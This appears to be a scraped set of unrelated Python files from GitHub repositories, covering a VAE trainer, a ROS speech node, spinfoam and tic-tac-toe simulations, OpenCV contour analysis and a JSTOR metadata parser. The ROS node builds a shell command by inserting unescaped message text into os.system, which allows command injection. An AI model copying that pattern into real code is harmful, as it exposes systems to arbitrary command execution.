| CTEC-121-Spring-2020/mod-4-programming-assignment-Rmballenger | Prob-3/Prob-3.py | Prob-3.py | py | 1,336 | python | en | code | 0 | github-code | 36 |
21577757864 | from imath.Trainer import Trainer
import torch
import imath as pt
import os
import torch.nn as nn
import numpy as np
class VAETrainer(Trainer):
def __init__(self, optim, lant_dim, criterion, **kwargs):
super(VAETrainer, self).__init__(**kwargs)
self.lant_dim = lant_dim
self.Distribute = self.model.Distribute
self.Decoder = self.model.Decoder
self.optim = optim
self.criterion = criterion
def forward(self, data, forward_mode, **kwargs):
img = data['x']
# print('??')
batch = img.size(0)
distrib = self.Distribute(img)
mul = distrib[:, 0:1]
log_sig = distrib[:, 1:2]
epi = torch.randn(batch, self.lant_dim).to(img.device)
# print(mul.shape, log_sig.shape, epi.shape)
z = mul + epi * torch.exp(log_sig / 2.)
z = z.view((batch, 6, 7, 6))
reconstrust = self.Decoder(z)
loss = self.criterion(img, reconstrust) * 10
self.update(self.optim, loss)
if forward_mode == 'train':
return {'loss': loss.item()}
else:
return {'rec': reconstrust}
def evaluate(self, batch_size, device, **kwargs):
# loss = []
for n, data in enumerate(self._evaluate(batch_size, device, **kwargs)):
# loss.append(data['loss'])
rec = data['rec']
# print(rec.shape)
if n == 1:
for r in rec[:2]:
im.imshow(r.squeeze())
# im.imsave('rec.png', r.squeeze()*256)
# loss = np.mean(np.array(loss))
return 1. | IMath123/imath | Trainer/VAETrainer.py | VAETrainer.py | py | 1,621 | python | en | code | 0 | github-code | 36 |
74850579945 | import sys
import time
import rospy
from array import array
from std_msgs.msg import String
import os
voicePublisher = rospy.Publisher('voiceOutput', String, queue_size=10)
def publishMessage(message):
voicePublisher.publish(message)
def listenNode(data):
print("callback " + data.data)
if data.data:
print("message receiveid")
os.system("espeak " + '"' + data.data + '"')
publishMessage("")
def listener():
rospy.init_node('listener', anonymous=True)
voiceSubscriber = rospy.Subscriber('voiceOutput', String, listenNode)
while not rospy.is_shutdown():
print("listening")
rospy.spin()
if __name__ == '__main__':
listener()
| LuizHenriqueP/ReadyFramework | readyVoiceOutput.py | readyVoiceOutput.py | py | 708 | python | en | code | 0 | github-code | 36 |
20406219922 | import os
import numpy as np
import tensorflow as tf
ROOT_DIR = os.path.abspath(__file__ + "/../../")
class BaseSpinFoam:
def __init__(self, spin_j, n_boundary_intertwiners, n_vertices):
self.n_boundary_intertwiners = n_boundary_intertwiners
self.n_vertices = n_vertices
self.spin_j = float(spin_j)
self.single_vertex_amplitudes = tf.convert_to_tensor(
_load_vertex_amplitudes(self.spin_j), dtype=tf.float64
)
@tf.function
def get_spinfoam_amplitudes(self, boundary_intertwiners):
pass
class StarModelSpinFoam(BaseSpinFoam):
def __init__(self, spin_j):
super().__init__(spin_j, n_boundary_intertwiners=20, n_vertices=6)
@tf.function(input_signature=[
tf.TensorSpec(shape=(None, 4), dtype=tf.int32),
])
def _get_amplitude_per_star_edge(self, boundary_intertwiners_per_edge):
amplitude = tf.gather_nd(
self.single_vertex_amplitudes, boundary_intertwiners_per_edge
)
return amplitude
@tf.function(input_signature=[
tf.TensorSpec(shape=(None, 20), dtype=tf.int32),
])
def get_spinfoam_amplitudes(self, boundary_intertwiners):
vertex_1 = self._get_amplitude_per_star_edge(
boundary_intertwiners[:, :4]
)
vertex_2 = self._get_amplitude_per_star_edge(
boundary_intertwiners[:, 4:8]
)
vertex_3 = self._get_amplitude_per_star_edge(
boundary_intertwiners[:, 8:12]
)
vertex_4 = self._get_amplitude_per_star_edge(
boundary_intertwiners[:, 12:16]
)
vertex_5 = self._get_amplitude_per_star_edge(
boundary_intertwiners[:, 16:20]
)
star_amplitudes = tf.einsum(
"abcde, ie, id, ic, ib, ia -> i",
self.single_vertex_amplitudes,
vertex_1, vertex_2, vertex_3, vertex_4, vertex_5
)
return star_amplitudes
class SingleVertexSpinFoam(BaseSpinFoam):
def __init__(self, spin_j):
super().__init__(spin_j, n_boundary_intertwiners=5, n_vertices=1)
@tf.function(input_signature=[
tf.TensorSpec(shape=(None, 5), dtype=tf.int32),
])
def get_spinfoam_amplitudes(self, boundary_intertwiners):
return tf.gather_nd(self.single_vertex_amplitudes, boundary_intertwiners)
class SpinFoamEnvironment:
"""
This class creates the hypergrid environment which the GFlowNet agent
interacts with. Loads the precalculated amplitudes for a single vertex,
calculates the corresponding probabilities, and stores them in self.rewards
Parameters:
----------
spin_j: (float)
Length of the grid in one dimension is 2*spin_j + 1. All
the lengths are equal in all dimensions
spinfoam_model: BaseSpinFoam
Python class representing a specific spinfoam model
n_boundary_intertwiners
- stores the number of boundary intertwiners
- represents the number of dimensions for the
environment grid
get_spinfoam_amplitudes()
- function that calculates the amplitudes of a specific
spinfoam model
- will be used to calculate the rewards for each position
in the environment grid
"""
def __init__(self, spinfoam_model: BaseSpinFoam):
self.spinfoam_model = spinfoam_model
self.grid_dimension = self.spinfoam_model.n_boundary_intertwiners
self.grid_length = int(2 * self.spinfoam_model.spin_j + 1)
@tf.function(input_signature=[tf.TensorSpec(shape=None, dtype=tf.int32)])
def reset_for_forward_sampling(self, batch_size):
"""Generate positions at the hypergrid origin of size batch_size"""
positions = tf.zeros(
shape=(batch_size, self.grid_dimension),
dtype=tf.int32
)
return positions
@staticmethod
@tf.function(input_signature=[
tf.TensorSpec(shape=(None, None), dtype=tf.int32),
tf.TensorSpec(shape=(None, None), dtype=tf.int32),
])
def step_forward(current_position, forward_action):
new_position = current_position + forward_action[:, :-1]
return new_position
@tf.function(input_signature=[tf.TensorSpec(shape=(None, None), dtype=tf.int32)])
def get_rewards(self, positions):
"""Get the corresponding rewards for positions"""
rewards = tf.reshape(
self._get_squared_spinfoam_amplitudes(positions), shape=(-1, 1)
)
return rewards
@tf.function(input_signature=[
tf.TensorSpec(shape=(None, None), dtype=tf.int32),
])
def _get_squared_spinfoam_amplitudes(self, positions):
return tf.math.square(
self.spinfoam_model.get_spinfoam_amplitudes(positions)
)
@tf.function
def reset_for_backward_sampling(self, batch_size):
"""Generate random positions in the hypergrid of size batch_size"""
positions = tf.random.uniform(
shape=(batch_size, self.grid_dimension),
minval=0, maxval=self.grid_length, dtype=tf.int32
)
return positions
@staticmethod
@tf.function
def step_backward(current_position, back_action):
new_position = current_position - back_action
return new_position
def _load_vertex_amplitudes(spin_j):
vertex = np.load(f"{ROOT_DIR}/data/EPRL_vertices/Python/Dl_20/vertex_j_{spin_j}.npz")
return vertex
| JosephRRB/GFlowNets_on_SpinFoams | core/environment.py | environment.py | py | 5,633 | python | en | code | 1 | github-code | 36 |
26419246863 | import cv2
import numpy as np
from functions import top_offset
class SceneMoments():
def __init__(self, sections_img, color, min_contour_size=1000, type_object="", offset=True, compl=False):
self.min_contour_size = min_contour_size
self.type_object = type_object
self.bw = np.all(sections_img == color, axis=-1).astype(np.uint8)
if offset:
self.bw = self.bw[top_offset:,:]
cv2.waitKey(0)
sections_bw = self.bw * 255
self.contours = self.get_contours(sections_bw)
self.contour, self.contour_index = self.get_contour()
self.defects = self.get_defects()
self.compl = compl
if compl:
sections_bw_compl = 255 - sections_bw
self.contours_compl = self.get_contours(sections_bw_compl)
self.defects_compl = self.get_defects()
def get_contours(self, img_bw):
contours, _ = cv2.findContours(img_bw, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)
return contours
def get_defects(self):
chull_list = [cv2.convexHull(contour,returnPoints=False) for contour in self.contours]
defects = [cv2.convexityDefects(contour, chull) for (contour,chull) in zip(self.contours, chull_list)]
if len(defects) == 0 or np.all(np.equal(defects[0], None)):
return []
defect = defects[self.contour_index]
if not isinstance(defect, np.ndarray):
return []
defect = defect[:,0,:].tolist()
defect = [[start, end, mid, length] for start, end, mid, length in defect if length > self.min_contour_size]
return defect
'''
Return the largest contour
'''
def get_contour(self):
if len(self.contours) == 0:
return [], -1
largest_area = 0
contour = self.contours[0]
i = 0
for _i, _contour in enumerate(self.contours):
area = cv2.contourArea(_contour)
if area > largest_area:
largest_area = area
contour = _contour
i = _i
return contour, i
# return self.contours[0], 0
'''
Return a list of string containing useful data about the object: length of the contours and length of the defects for both, complement and normal
'''
def sstr(self):
if not self.compl:
lengths = "{} contours: {} defects: {}".format(self.type_object, len(self.contours), len(self.defects))
return [lengths, ""]
else:
lengths = "{} contours: {} defects: {}".format(self.type_object, len(self.contours), len(self.defects))
lengths_compl = "Compl contours: {} defects: {}".format(len(self.contours_compl), len(self.defects_compl))
return [lengths, lengths_compl, ""]
def paint_defects(self, img, color):
if len(self.contours) == 0:
return img
contour = self.contour
for s, e, m, l in self.defects:
cv2.circle(img, (contour[m][0][0], contour[m][0][1] + top_offset), 5, color, -1)
return img
def paint_lines(self, img, color):
if len(self.contours) == 0:
return img
contour = self.contour
for s, e, m, l in self.defects:
cv2.line(img, (contour[s][0][0], contour[s][0][1] + top_offset), (contour[e][0][0], contour[e][0][1] + top_offset), color, 2)
return img
def paint_contours(self, img, color):
if len(self.contours) == 0:
return img
contour = self.contour
contour = np.array([[[c[0][0], c[0][1] + top_offset]] for c in contour])
cv2.drawContours(img, contour, -1, color, 2)
return img | onmax/Robotics | scene-detection/detection/scene_moments.py | scene_moments.py | py | 3,808 | python | en | code | 0 | github-code | 36 |
74160109863 | cube = lambda x: x ** 3
def fibonacci(n):
result = []
i = 0
a, b = 0, 1
while i < n:
result.append(a)
a, b = b, a + b
i += 1
return result
print(list(map(cube, fibonacci(int(input()))))) | CodingProgrammer/HackerRank_Python | (Python Functionals)Map_and_Lambda_Function.py | (Python Functionals)Map_and_Lambda_Function.py | py | 232 | python | en | code | 0 | github-code | 36 |
71622209064 | import copy
import random
# # ---------------Input File & board dimension----------------/
input_txt = open("input15.txt", "r")
board_dimension = int(input_txt.readline())
board_area = [[0 for i in range(board_dimension)] for j in range(board_dimension)]
for i in range(0, board_dimension):
row = input_txt.readline()
for j in range(0, board_dimension):
board_area[i][j] = int(row[j])
input_txt.close()
# def get_converage_array(x, y, board_area):
# ## Set Dummy Value to identify index later
# board_area = copy.deepcopy(board_area)
# board_area[x][y] = 100
# matrix_dim = len(board_area)
# row_limit = [x - 3, x + 3 + 1]
# col_limit = [y - 3, y + 3 + 1]
# if col_limit[0] < 0:
# col_limit[0] = 0
# if col_limit[1] > matrix_dim:
# col_limit[1] = matrix_dim
# if row_limit[0] < 0:
# row_limit[0] = 0
# if row_limit[1] > matrix_dim:
# row_limit[1] = matrix_dim
# subset = [l[col_limit[0]:col_limit[1]] for l in board_area[row_limit[0]:row_limit[1]]]
# return subset
# def get_new_x_and_y(coverage_array):
# new_x, new_y = None, None
# ## Can be optimized
# for i in range(len(coverage_array)):
# for j in range(len(coverage_array[0])):
# if coverage_array[i][j] == 100:
# new_x, new_y = i, j
# break
# return new_x, new_y
# def get_transformed_array(new_x, new_y, coverage_array):
# valid_coverage_array = copy.deepcopy(coverage_array)
# ## Setting value 9 to count later
# for i in range(len(valid_coverage_array)):
# for j in range(len(valid_coverage_array[0])):
# if i == new_x or j == new_y or (abs(new_x - i) == abs(new_y - j)):
# if coverage_array[i][j] == 0:
# valid_coverage_array[i][j] = 9
# return valid_coverage_array
def get_total_cells_covered_at_point_and_covered_coordinates(x, y, inp_board):
block_row_left = False
block_row_right = False
block_col_up = False
block_col_down = False
block_diag_lr_down = False
block_diag_lr_up = False
block_diag_rl_down = False
block_diag_rl_up = False
convered_coordinates = []
def check_condition(x, y, board_area):
n_row = len(board_area)
n_col = len(board_area[0])
n_row_index = n_row - 1
n_col_index = n_col - 1
if x > n_row_index or y > n_col_index or x < 0 or y < 0:
return 0
if board_area[x][y] != 3:
return 1
return 0
i = 1
valid_coverage_cell_count = 1
convered_coordinates.append([x, y])
while (i <= 3):
# Row Left
if not block_row_left:
if check_condition(x, y + i, inp_board):
convered_coordinates.append([x, y + i])
valid_coverage_cell_count += 1
else:
block_row_left = True
# Row Right
if not block_row_right:
if check_condition(x, y - i, inp_board):
convered_coordinates.append([x, y - i])
valid_coverage_cell_count += 1
else:
block_row_right = True
# Col Up
if not block_col_up:
if check_condition(x - i, y, inp_board):
convered_coordinates.append([x - i, y])
valid_coverage_cell_count += 1
else:
block_col_up = True
# Col Down
if not block_col_down:
if check_condition(x + i, y, inp_board):
convered_coordinates.append([x + i, y])
valid_coverage_cell_count += 1
else:
block_col_down = True
# Diagnol L->R Down
if not block_diag_lr_down:
if check_condition(x + i, y + i, inp_board):
convered_coordinates.append([x + i, y + i])
valid_coverage_cell_count += 1
else:
block_diag_lr_down = True
# Diagnol L->R Up
if not block_diag_lr_up:
if check_condition(x - i, y - i, inp_board):
convered_coordinates.append([x - i, y - i])
valid_coverage_cell_count += 1
else:
block_diag_lr_up = True
# Diagnol R->L Down
if not block_diag_rl_down:
if check_condition(x - i, y + i, inp_board):
convered_coordinates.append([x - i, y + i])
valid_coverage_cell_count += 1
else:
block_diag_rl_down = True
# Diagnol R->L Up
if not block_diag_rl_up:
if check_condition(x + i, y - i, inp_board):
convered_coordinates.append([x + i, y - i])
valid_coverage_cell_count += 1
else:
block_diag_rl_up = True
i += 1
return convered_coordinates, valid_coverage_cell_count
def simulation_action(sim_board_input):
max_value = -99
max_value_x = None
max_value_y = None
max_convered_coordinates = None
result_dict = {}
for i in range(len(sim_board_input)):
for j in range((len(sim_board_input))):
if sim_board_input[i][j] != 0:
continue
# coverage_array = get_converage_array(i, j, sim_board_input)
# new_x, new_y = get_new_x_and_y(coverage_array)
# valid_coverage_array = get_transformed_array(new_x, new_y, coverage_array)
convered_coordinates, coverage_value = get_total_cells_covered_at_point_and_covered_coordinates(i, j,
sim_board_input)
if coverage_value > max_value:
max_value = coverage_value
max_value_x, max_value_y = i, j
max_convered_coordinates = convered_coordinates
result_dict['max_value'] = max_value
result_dict['max_value_x'] = max_value_x
result_dict['max_value_y'] = max_value_y
result_dict['max_convered_coordinates'] = max_convered_coordinates
return result_dict
def calculate_score(my_board, opp_board):
my_score = sum(x.count(10) for x in my_board)
my_score += sum(x.count(1) for x in my_board)
opp_score = sum(x.count(20) for x in opp_board)
opp_score += sum(x.count(2) for x in opp_board)
return my_score - opp_score
def simulate(i, j, board_input, print_logs=False):
my_coverage = copy.deepcopy(board_input)
opp_coverage = copy.deepcopy(board_input)
board_sim_input = copy.deepcopy(board_input)
board_sim_input[i][j] = 1
my_coverage[i][j] = 1
convered_coordinates, coverage_value = get_total_cells_covered_at_point_and_covered_coordinates(i, j,
board_sim_input)
for _pos in convered_coordinates:
my_coverage[_pos[0]][_pos[1]] = 10
board_sim_input[_pos[0]][_pos[1]] = 10
if print_logs:
print('I Selected : ({}, {})'.format(i, j))
# print('({}, {}) Simulation Base Score: {}'.format(i, j, calculate_score(my_coverage, opp_coverage)))
# n_sim = sum(x.count(0) for x in board_sim_input)
counter = 1
while (sum(x.count(0) for x in board_sim_input) != 0):
res_dict = simulation_action(board_sim_input)
if counter % 2 == 0:
for _pos in res_dict['max_convered_coordinates']:
my_coverage[_pos[0]][_pos[1]] = 10
if board_sim_input[_pos[0]][_pos[1]] != 0:
board_sim_input[_pos[0]][_pos[1]] = 30
else:
board_sim_input[_pos[0]][_pos[1]] = 10
board_sim_input[res_dict['max_value_x']][res_dict['max_value_y']] = 1
if print_logs:
print('I Selected : ({}, {})'.format(res_dict['max_value_x'], res_dict['max_value_y']))
else:
for _pos in res_dict['max_convered_coordinates']:
opp_coverage[_pos[0]][_pos[1]] = 20
if board_sim_input[_pos[0]][_pos[1]] != 0:
board_sim_input[_pos[0]][_pos[1]] = 30
else:
board_sim_input[_pos[0]][_pos[1]] = 20
board_sim_input[res_dict['max_value_x']][res_dict['max_value_y']] = 2
if print_logs:
print('Opp Selected : ({}, {})'.format(res_dict['max_value_x'], res_dict['max_value_y']))
if print_logs:
pass
# print(np.matrix(my_coverage))
# print(np.matrix(opp_coverage))
print(np.matrix(board_sim_input))
print('({}, {}) Simulation number: {} Score: {}'.format(i, j, counter,
calculate_score(my_coverage, opp_coverage)))
counter += 1
if print_logs:
print(np.matrix(board_sim_input))
print('({}, {}) Simlutaion, Final Score: {}'.format(i, j, calculate_score(my_coverage, opp_coverage)))
return calculate_score(my_coverage, opp_coverage)
def main(sim_board_input, print_logs=False):
final_res_dict = {}
max_value = -99
max_value_x = None
max_value_y = None
sim_board_input_copy = copy.deepcopy(sim_board_input)
for i in range(len(sim_board_input)):
for j in range((len(sim_board_input))):
if sim_board_input_copy[i][j] == 1:
convered_coordinates, coverage_value = get_total_cells_covered_at_point_and_covered_coordinates(i, j,
sim_board_input_copy)
for _pos in convered_coordinates:
sim_board_input[_pos[0]][_pos[1]] = 10
if sim_board_input_copy[i][j] == 2:
convered_coordinates, coverage_value = get_total_cells_covered_at_point_and_covered_coordinates(i, j,
sim_board_input_copy)
for _pos in convered_coordinates:
if sim_board_input[_pos[0]][_pos[1]] == 10:
sim_board_input[_pos[0]][_pos[1]] = 30
else:
sim_board_input[_pos[0]][_pos[1]] = 20
for i in range(len(sim_board_input)):
for j in range((len(sim_board_input))):
if sim_board_input[i][j] != 0:
continue
coverage_score = simulate(i, j, sim_board_input, print_logs=False)
if coverage_score > max_value:
max_value = coverage_score
max_value_x, max_value_y = i, j
if print_logs:
print("Best Location Coordinated (X, Y) = ({}, {}) and Final Score = {}".format(max_value_x, max_value_y,
max_value))
print("*" * 100)
print('Simulation: ')
print("*" * 100)
print('Input Matrix: ')
print(np.matrix(sim_board_input))
res_sim = simulate(max_value_x, max_value_y, sim_board_input, print_logs)
final_res_dict['max_value_x'] = max_value_x
final_res_dict['max_value_y'] = max_value_y
final_res_dict['final_score'] = max_value
abc = int(max_value_x)
xyz = int(max_value_y)
# Output Required Coordinates
with open("output.txt", "w") as f2:
f2.write("%d %d" % (abc, xyz))
#print("Move coordinates: (%d, %d)" %(abc, xyz))
main(board_area)
# main(board_area, print_logs=True) | addyg/AI_Game_Algorithm | ai_program_v5.1.py | ai_program_v5.1.py | py | 11,434 | python | en | code | 2 | github-code | 36 |
6821308185 | import csv
import random
import math
import numpy as np
input = open('data_pool_rabel_sorted.csv', 'r', encoding='utf-8')
input_reader = csv.reader(input)
output = open('data_rabel_pool.csv', 'w', encoding='utf-8')
output_writer = csv.writer(output)
check = 0
num = 0
length = 0
curr = -1
ret = []
for line in input_reader: #0 : length, #1 : discared, #2: rabel, #3 : id #4 : in id order, after is zum/
if(check == 0): #real first
check = 1
length = int(line[0])
ret = [int(line[3]), int(line[2])]
curr = int(line[3])
temp = line[5:5+int(line[0])*2]
ret = ret + temp
continue
if(int(line[3]) == curr):
length = length + int(line[0])
temp = line[5:5+int(line[0])*2]
ret = ret + temp
continue
#not same.
ret = [length] + ret
output_writer.writerow(ret)
curr = int(line[3])
ret = [int(line[3]), int(line[2])]
temp = line[5:5+int(line[0])*2]
ret = ret + temp
length = int(line[0])
ret = [length] + ret
output_writer.writerow(ret)
input.close()
output.close()
| KyeongmoonKim/recognition_of_the_numeral_gesture | data3.py | data3.py | py | 1,030 | python | en | code | 0 | github-code | 36 |
6824189243 | import math
def primeCheck(num):
prime = math.sqrt(num)
for i in range(2,int(prime)) :
if num%i == 0:
return False
return True
def sol(N):
stack = []
for num in range(pow(10,N-1),pow(10,N)) :
if primeCheck(num) :
stack.append(num)
print(stack)
if __name__ == "__main__" :
N = int(input())
sol(N)
| yeonwook1993/algorithm_study | bfs_dfs/2023.py | 2023.py | py | 320 | python | en | code | 0 | github-code | 36 |
16515258502 | """
ARGUMENTS: python3 ParseMetaFilesUpdated.py <path-to-jstor-data> <which-part> <how-many-parts> <output-path>
<how-many-parts>: for parallel processing, this should be the number of workers available to run the program; 1 if not running in parallel.
<which-part>: for parallel processing, this should be a unique number for each worker, from 1 to <how-many-parts>; 1 if not running in parallel.
USAGE: This program takes already-split dictionaries and reads in a batch of JSTOR article n-gram files to count the number of appearances of each n-gram in the dictionaries.
INPUT: JSTOR metadata files.
OUTPUT: A table in HDF5 format, indexed on 'file_name', consisting of 18 columns.
"""
import math
import os
import re
import sys
from tqdm import tqdm
from xml.etree import ElementTree as ET
import pandas as pd
# check if improper number of arguments; if so, return instructions and quit
if len(sys.argv) != 5:
print(__doc__)
exit()
# read in arguments from command line
JSTOR_HOME, NUM, NUM_CPUS, OUTPATH = sys.argv[1:]
NUM, NUM_CPUS = int(NUM), int(NUM_CPUS)
METADATA_HOME = os.path.join(JSTOR_HOME, 'metadata/')
path, dirs, files = next(os.walk(METADATA_HOME))
files = [(path + file) for file in files] # Add folder name "path" as prefix to file
NUM_EACH = math.ceil(len(files) / NUM_CPUS)
LEFT = (NUM - 1) * NUM_EACH
RIGHT = LEFT + NUM_EACH
files = files[LEFT:RIGHT]
def add(elem, attrs):
# TO DO: Filter by article-type?
elements = attrs['elements']
surnames = attrs['surname']
given_names = attrs['given-names']
tag = elem.tag
if tag in attrs['df_cols']:
if tag == 'journal-id':
tag = 'journal_id'
elif tag == 'article':
article_attrs = elem.attrib
article_type = article_attrs['article-type']
tag = 'type'
elem.text = article_type
elif tag =='journal-title':
tag = 'journal_title'
elif tag == 'article-id':
tag = 'article_id'
elif tag == 'article-name':
tag = 'article_name'
elif tag == 'surname':
if type(elem.text) == 'str':
surnames.append(elem.text.split(',')[0])
else:
surnames.append('None')
elem.text = surnames
elif tag == 'given-names':
tag = 'given_names'
given_names.append(elem.text)
elem.text = given_names
elif tag == 'issue-id':
tag = 'issue_id'
elif tag == 'ns1:ref':
tag = 'jstor_url'
elif tag == 'p':
tag = 'abstract'
# if tag not in elements:
# elements[tag] = pd.Series([elem.text])
# else:
# elements[tag].append(pd.Series([elem.text]), ignore_index=True)
len_list = len(elements[tag])
elements[tag][len_list - 1] = elem.text
for child in elem.findall('*'):
add(child, attrs)
def xml2df(xml_files):
"""Transforms XML files into a Pandas DataFrame.
Args:
files: list of complete file paths
Returns:
df: DataFrame with article info"""
all_records = {'type':[], 'journal_id':[], 'journal_title':[], 'issn':[], 'article_id':[], 'article_name':[], 'given_names':[], 'surname':[], 'day':[], 'month':[], 'year':[], 'volume':[], 'issue':[], 'issue_id':[], 'fpage':[], 'lpage':[], 'jstor_url':[], 'abstract':[]}
attrs = {}
attrs['elements'] = all_records
attrs['surname'] = []
attrs['given-names'] = []
attrs['df_cols'] = ['article', 'journal-id', 'journal-title', 'issn', 'article-id', 'article-name', 'given-names', 'surname', 'day', 'month', 'year', 'volume', 'issue', 'issue-id', 'fpage', 'lpage', 'ns1:ref', 'p']
for file in tqdm(xml_files):
with open(file, 'rb') as f:
t = ET.parse(f) # element tree
root = t.getroot()
for record in all_records:
all_records[record].append('None')
add(root, attrs)
#print(all_records)
print ('Start creating data frame')
df = pd.DataFrame(all_records)
return df
# This is definitely NOT a good practice. However, I'm trying not to break what's running properly.
def amend_df(df, files):
file_names = []
jstor_urls = []
abstracts = []
article_names = []
for file in tqdm(files):
file_names.append(re.findall('journal-article-.+\.xml', file)[0][:-4])
with open(file, 'rb') as f:
t = ET.parse(f) # element tree
root = t.getroot()
try:
jstor_urls.append(root.find('front').find('article-meta').find('self-uri').items()[0][1])
except:
jstor_urls.append('None')
try:
abstracts.append(root.find('front').find('article-meta').find('abstract').find('p').text)
except:
abstracts.append('None')
try:
article_names.append(root.find('front').find('article-meta').find('title-group').find('article-title').text)
except:
article_names.append('None')
df.loc[:, 'file_name'] = file_names
df.loc[:, 'jstor_url'] = jstor_urls
df.loc[:, 'abstract'] = abstracts
df.loc[:, 'article_name'] = article_names
print('Start processing')
df = xml2df(files)
print('Start amending')
amend_df(df, files)
# df.to_pickle('pickles/part{}.pickle'.format(n))
df.set_index('file_name').to_hdf(os.path.join(OUTPATH, 'part{}.h5'.format(NUM)), key='metadata', mode='w')
#df.set_index('file_name').to_pickle(os.path.join(OUTPATH, 'part{}.pickle'.format(NUM))) | h2researchgroup/dictionary_methods | code/ParseMetaFilesUpdated.py | ParseMetaFilesUpdated.py | py | 5,612 | python | en | code | 0 | github-code | 36 |
16534298320 | import matplotlib.pyplot as plt
import seaborn as sns
sns.set()
class VizHelp():
# Additional Usefull Display Methods
def plotPredictions(self, predictions, targets, decoder_steps, epochs, file_name, show=True):
stock_name = file_name.split('.')[0].upper()
if '/' in stock_name:
stock_name = stock_name.split('/')[-1]
plt.plot(targets, label='Actual')
plt.plot(predictions, label='Predicted')
plt.legend()
plt.xlabel('Samples')
plt.ylabel('Scaled Price')
plt.title(f'Price Prediction {stock_name}: D={decoder_steps}, Epoch={epochs}', fontsize=14)
print(f'Saving image to: plots/Test_{stock_name}D{decoder_steps}_E{epochs}.png')
plt.savefig(f'plots/Test_{stock_name}_D{decoder_steps}_E{epochs}.png')
if show:
plt.show()
else:
plt.close()
def plotMSE(self, errors, decoder_steps, num_samples=1, name='', show=True):
epoch_counts = [i/num_samples for i in range(len(errors))]
plt.plot(epoch_counts, errors)
plt.xlabel('Epochs')
plt.ylabel('MSE')
plt.title(f'MSE {name}: D={decoder_steps}', fontsize=14)
print(f'Saving image to: plots/{name}D{decoder_steps}_E{epoch_counts[-1]}.png')
plt.savefig(f'plots/{name}_D{decoder_steps}_E{epoch_counts[-1]}.png')
if show:
plt.show()
else:
plt.close() | rvariverpirate/TRN_StockPrediction | VisualizationHelpers.py | VisualizationHelpers.py | py | 1,429 | python | en | code | 0 | github-code | 36 |
16277554121 | import pygame
from constants import *
import numpy
class Board:
# Initializing the board with screen as an input
def __init__(self, screen) -> None:
self.screen = screen
self.game_array = numpy.zeros((WINDOW_SIZE // CUBE_SIZE, WINDOW_SIZE // CUBE_SIZE))
self.draw_board()
self.turn = 1
self.game_is_on = True
# Drawing the board
def draw_board(self):
# Drawing vertical lines
for x in range(1, VERTICAL_LINES + 1):
pygame.draw.line(self.screen, BLACK, (0, CUBE_SIZE * x), (CUBE_SIZE * 3, CUBE_SIZE * x), LINE_WIDTH)
# Drawing horizontal lines
for y in range(1, HORIZONTAL_LINES + 1):
pygame.draw.line(self.screen, BLACK, (CUBE_SIZE * y, 0), (CUBE_SIZE * y, CUBE_SIZE * 3), LINE_WIDTH)
# Changing turn
def change_turn(self):
self.turn *= -1
# Checking if field is available
def is_available(self, pos) -> bool:
if self.game_array[pos[0]][pos[1]] == 0:
return True
return False
# Putting mark on the field and changing turn
def put_mark(self, pos):
if self.is_available(pos):
# -1 is cross
if self.turn == -1:
# Loading image of a cross
img = pygame.image.load("Tic_Tac_Toe/resources/cross.png")
img = pygame.transform.scale(img, (CUBE_SIZE // 1.5, CUBE_SIZE // 1.5))
# 1 is dot
elif self.turn == 1:
# Loading image of a dot
img = pygame.image.load("Tic_Tac_Toe/resources/dot.png")
img = pygame.transform.scale(img, (CUBE_SIZE // 1.5, CUBE_SIZE // 1.5))
self.game_array[pos[0]][pos[1]] = self.turn
x = pos[0] * CUBE_SIZE + CUBE_SIZE // 6
y = pos[1] * CUBE_SIZE + CUBE_SIZE // 6
self.screen.blit(img, (y, x))
self.change_turn()
# Winning line
def draw_winning_line(self, start_pos:tuple, end_pos:tuple):
start_x = start_pos[0] * CUBE_SIZE + CUBE_SIZE // 2
start_y = start_pos[1] * CUBE_SIZE + CUBE_SIZE // 2
end_x = end_pos[0] * CUBE_SIZE + CUBE_SIZE // 2
end_y = end_pos[1] * CUBE_SIZE + CUBE_SIZE // 2
return pygame.draw.line(self.screen, RED, (start_x, start_y), (end_x, end_y), LINE_WIDTH)
# Ending text
def write_ending_text(self, text:str):
font = pygame.font.Font(None, 36)
text = font.render(f"{text}", True, BLACK)
space = font.render("Press Space to Restart", True, BLACK)
self.screen.blit(text, (15, 15))
self.screen.blit(space, (CUBE_SIZE + CUBE_SIZE // 12, WINDOW_SIZE // 1.05))
# Checking for win or tie
def check_for_win(self):
# Checking if win for rows
for row in range(3):
winning_row = 0
for col in range(3):
if self.game_array[row][col] == 1:
winning_row += 1
elif self.game_array[row][col] == -1:
winning_row += -1
# Checking if row is full of X or O
if winning_row == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((0, row),(2, row))
self.game_is_on = False
break
elif winning_row == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((0, row),(2, row))
self.game_is_on = False
break
# Checking if win for cols
for row in range(3):
winning_col = 0
for col in range(3):
if self.game_array[col][row] == 1:
winning_col += 1
elif self.game_array[col][row] == -1:
winning_col += -1
# Checking if column is full of X or O
if winning_col == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((row, 0),(row, 2))
self.game_is_on = False
break
elif winning_col == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((row, 0),(row, 2))
self.game_is_on = False
break
# Checking if win for axis
if self.game_array[0][0] + self.game_array[1][1] + self.game_array[2][2] == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((0, 0),(2, 2))
self.game_is_on = False
elif self.game_array[0][2] + self.game_array[1][1] + self.game_array[2][0] == 3:
self.write_ending_text("Dot wins!")
self.draw_winning_line((0, 2),(2, 0))
self.game_is_on = False
elif self.game_array[0][0] + self.game_array[1][1] + self.game_array[2][2] == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((0, 0),(2, 2))
self.game_is_on = False
elif self.game_array[0][2] + self.game_array[1][1] + self.game_array[2][0] == -3:
self.write_ending_text("Cross wins!")
self.draw_winning_line((0, 2),(2, 0))
self.game_is_on = False
# Checking for a tie
num_of_zeroes = 0
for row in range(3):
for col in range(3):
if self.game_array[row][col] == 0:
num_of_zeroes += 1
if num_of_zeroes == 0 and self.game_is_on:
self.write_ending_text("It's a tie!")
self.game_is_on = False
| szczepanspl/tic_tac_toe | board.py | board.py | py | 5,668 | python | en | code | 0 | github-code | 36 |
43298614784 | from pypy.module.imp import importing
from pypy.module._file.interp_file import W_File
from rpython.rlib import streamio
from rpython.rlib.streamio import StreamErrors
from pypy.interpreter.error import oefmt
from pypy.interpreter.module import Module
from pypy.interpreter.gateway import unwrap_spec
